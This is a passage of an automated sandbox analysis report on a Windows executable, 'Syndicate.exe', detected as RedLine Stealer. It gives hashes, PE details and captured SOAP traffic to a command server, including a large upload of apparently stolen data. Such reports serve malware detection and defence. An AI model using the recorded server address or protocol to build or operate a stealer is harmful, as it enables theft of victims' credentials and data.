SSDEEP: 24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5: 31CD00400A977C512B9F1AF51F2A5F90
SHA1: 3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256: E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512: 0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious: false
C:\Users\user\AppData\Local\Temp\tmpF1BF.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.702247102869977
Encrypted: false
SSDEEP: 24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5: B734D7226D90E4FD8228EE89C7DD26DA
SHA1: EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256: ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512: D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious: false
C:\Users\user\AppData\Local\Temp\tmpF1C0.tmp
Process: C:\Users\user\Desktop\Syndicate.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6980379859154695
Encrypted: false
SSDEEP: 24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5: 4E3F4BE1B97FA984F75F11D95B1C2602
SHA1: C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256: 59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512: DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious: false
Static File Info
General
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.791069579498099
TrID:
Win32 Executable (generic) a (10002005/4) 99.96%
Generic Win/DOS Executable (2004/3) 0.02%
DOS Executable Generic (2002/1) 0.02%
Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Syndicate.exe
File size: 2300520
MD5: 1ca3d04a1c28f573e0a31c49881c8c4a
SHA1: 30a0a21660c49c0a44c981396c435483efad865e
SHA256: 196e6323c5ffd2105f1159a77c1b1cb583deb9d27875232f5fae5635a39a637d
SHA512: aeede683d62f29b2e24f7352ff296c7249c3eccc6a6b3c165b060454a0704cf52b1137dbcdb24b7045c526f6a6e6b70f79935ed78866b552b7338cec38e6be64
SSDEEP: 49152:s4BxRE/3VvQCzbS6Sr+WL0WCq5wj3oLqJLmO+Fm4TZDetWmyxOFZVIW:sUEfRQob6N63oss8ISV7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.................0..x..........X.N.. ........@.. ........................l.......#...@................................
File Icon
Icon Hash: 44f0e8e86071b254
Static PE Info
General
Entrypoint: 0x8ea058
Entrypoint Section: .boot
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp: 0x911E9747 [Mon Feb 25 09:52:07 2047 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 4328f7206db519cd4e82283211d98e83
Authenticode Signature
Signature Valid: false
Signature Issuer: CN=COMODO RSA Extended Validation Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After: 10/6/2019 5:00:00 PM, 10/6/2022 4:59:59 PM
Subject Chain: CN=Telegram FZ-LLC, O=Telegram FZ-LLC, STREET="Business Central Towers, Tower A, Office 2301 2303", L=Dubai, S=Dubai, C=AE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349
Version: 3
Thumbprint MD5: 034F2391B5CE85A7D99BC43FE240F70F
Thumbprint SHA-1: D4C89B25D3E92D05B44BC32C0CBFD7693613F3EE
Thumbprint SHA-256: E31F1B9C3DDD0EDEFDF96F85B8FFD1DB976573BB262CC6E1154AD8FDC4D55449
Serial: 1F3216F428F850BE2C66CAA056F6D821
Sections
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
0x2000 0x18000 0x8c00 False 0.993359375 data 7.98687941304 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
0x1a000 0x3df84 0x3400 False 0.990159254808 data 7.96015124239 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
0x58000 0xc 0x400 False 0.625 data 5.20647410606 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.vm_sec 0x5a000 0x4000 0x4000 False 0.180236816406 data 3.16443092163 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata 0x5e000 0x2000 0x400 False 0.087890625 data 0.643057928191 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc 0x60000 0x3dfa2 0x3e000 False 0.0679419732863 data 3.64616757736 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida 0x9e000 0x44c000 0x0 unknown unknown unknown unknown IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.boot 0x4ea000 0x1e0c00 0x1e0c00 False 0.9944006354 data 7.95367837591 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Possible Origin
Language of compilation system Country where language is spoken Map
English United States
Network Behavior
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Jul 25, 2021 11:46:16.103388071 CEST 192.168.2.3 8.8.8.8 0x76c7 Standard query (0) api.ip.sb A (IP address) IN (0x0001)
Jul 25, 2021 11:46:16.156313896 CEST 192.168.2.3 8.8.8.8 0xce80 Standard query (0) api.ip.sb A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Jul 25, 2021 11:46:16.144757032 CEST 8.8.8.8 192.168.2.3 0x76c7 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net CNAME (Canonical name) IN (0x0001)
Jul 25, 2021 11:46:16.192190886 CEST 8.8.8.8 192.168.2.3 0xce80 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net CNAME (Canonical name) IN (0x0001)
HTTP Packets
65.21.103.71:56458
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.3 49730 65.21.103.71 56458 C:\Users\user\Desktop\Syndicate.exe
Timestamp kBytes transferred Direction Data
Jul 25, 2021 11:46:09.341821909 CEST 1075 OUT
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 65.21.103.71:56458
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Jul 25, 2021 11:46:09.385097027 CEST 1075 IN
HTTP/1.1 100 Continue

Jul 25, 2021 11:46:09.431422949 CEST 1078 IN
HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Sun, 25 Jul 2021 09:46:09 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>

Jul 25, 2021 11:46:15.610199928 CEST 1097 OUT
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 65.21.103.71:56458
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Jul 25, 2021 11:46:15.653594017 CEST 1097 IN
HTTP/1.1 100 Continue
Jul 25, 2021 11:46:15.769517899 CEST 1099 IN
HTTP/1.1 200 OK
Content-Length: 5470
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Sun, 25 Jul 2021 09:46:15 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>186.0.49.204</b:string><b:string>183.171.158.219</b:string><b:string>223.204.235.55</b:string><b:string>71.232.54.222</b:string><b:string>179.6.201.23</b:string><b:string>182.1.121.204</b:string><b:string>108.41.104.95</b:string><b:string>49.144.36.223</b:string><b:string>200.236.251.87</b:string><b:string>191.193.94.147</b:string><b:string>173.75.218.96</b:string><b:string>47.13.55.62</b:string><b:string>92.81.217.40</b:string><b:string>69.174.145.1</b:string><b:string>95.178.174.143</b:string><b:string>186.84.22.11</b:string><b:string>162.227.151.15</b:string><b:string>94.129.194.39</b:string><b:string>85.202.36.40</b:string><b:string>46.65.234.137</b:string><b:string>180.180.41.59</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:Sc
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.3 49733 65.21.103.71 56458 C:\Users\user\Desktop\Syndicate.exe
Timestamp kBytes transferred Direction Data
Jul 25, 2021 11:46:21.311783075 CEST 1109 OUT
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 65.21.103.71:56458
Content-Length: 1152391
Expect: 100-continue
Accept-Encoding: gzip, deflate

Jul 25, 2021 11:46:21.354468107 CEST 1110 IN
HTTP/1.1 100 Continue

Jul 25, 2021 11:46:21.831581116 CEST 2278 IN
HTTP/1.1 200 OK
Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Sun, 25 Jul 2021 09:46:21 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Jul 25, 2021 11:46:21.835778952 CEST 2278 OUT
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 65.21.103.71:56458
Content-Length: 1152383
Expect: 100-continue
Accept-Encoding: gzip, deflate

Jul 25, 2021 11:46:21.877815962 CEST 2278 IN
HTTP/1.1 100 Continue
Jul 25, 2021 11:46:22.808171034 CEST 3965 IN
HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Sun, 25 Jul 2021 09:46:21 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
System Behavior
Analysis Process: Syndicate.exe PID: 4900 Parent PID: 5696
General
Start time: 11:45:57
Start date: 25/07/2021
Path: C:\Users\user\Desktop\Syndicate.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Syndicate.exe'
Imagebase: 0xca0000
File size: 2300520 bytes
MD5 hash: 1CA3D04A1C28F573E0A31C49881C8C4A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches: Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.200580397.0000000001C70000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low
Analysis Process: conhost.exe PID: 4196 Parent PID: 4900
General
Start time: 11:45:58
Start date: 25/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Analysis Process: GameBarPresenceWriter.exe PID: 5920 Parent PID: 792
General
Start time: 11:45:59
Start date: 25/07/2021
Path: C:\Windows\System32\GameBarPresenceWriter.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\GameBarPresenceWriter.exe' -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
Imagebase: 0x7ff6cadc0000
File size: 297984 bytes
MD5 hash: 04FC9C82E4D082B728D3337D75043690
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Analysis Process: GameBar.exe PID: 5572 Parent PID: 792
General
Start time: 11:46:00
Start date: 25/07/2021
Path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_1.15.1001.0_x64__8wekyb3d8bbwe\GameBar.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_1.15.1001.0_x64__8wekyb3d8bbwe\GameBar.exe' -ServerName:App.AppXbdkk0yrkwpcgeaem8zk81k8py1eaahny.mca
Imagebase: 0x7ff7b7fd0000
File size: 3911680 bytes
MD5 hash: 754FD02CE495D5A4C90D6539727319EA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate